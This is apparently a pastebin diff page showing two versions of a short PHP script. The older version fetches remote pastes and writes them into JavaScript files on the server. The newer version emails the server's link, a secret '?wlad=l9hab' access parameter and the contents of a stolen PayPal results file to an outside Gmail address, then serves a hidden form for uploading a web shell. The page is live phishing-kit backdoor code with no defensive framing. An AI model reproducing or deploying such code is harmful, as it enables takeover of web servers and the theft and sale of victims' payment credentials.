View difference between Paste ID: 7ejUphZB and 7QCUNuAz
SHOW: | | - or go back to the newest paste.
1-
<?
1+
<?php
2-
set_time_limit(0);
2+
$ss = $_SERVER['REMOTE_ADDR'];
3-
error_reporting(0);
3+
$to .= 'havij.exe@gmail.com';
4-
$chh="http://pastebin.com/raw/7ejUphZB"; $scann=file_get_contents($chh); 
4+
$subject = 'PPL LOGIN FROM | '.$ss.'';
5-
$chh="http://pastebin.com/raw/4hp0i2tT"; $scan=file_get_contents($chh); 
5+
$message = "Link Shells : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?wlad=l9hab"."\r\n\n"."_________________________________". file_get_contents("result/paypal.txt") . "\n";
6-
$zz=fopen('css/function.js','w');fwrite($zz,$scann);fclose($zz); 
6+
$headers  = 'MIME-Version: 1.0' . "\r\n";
7-
$z=fopen('css/white.js','w');fwrite($z,$scan);fclose($z); 
7+
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
8
$headers .= 'From: Dexter <localhost>' . "\r\n";
9
mail($to, $subject, $message, $headers);
10
 
11
$nemo  = $_GET['wlad'];
12
if($nemo == 'l9hab'){
13
$nemoshell = $_FILES['file']['name'];
14
$nemohero  = $_FILES['file']['tmp_name'];
15
echo "<form method='POST' enctype='multipart/form-data'>
16
       <input type='file'name='file' />
17
       <input type='submit' value='upload shell' />
18
</form>";
19
move_uploaded_file($nemohero,$nemoshell);
20
}
21
 
22
 
23
?>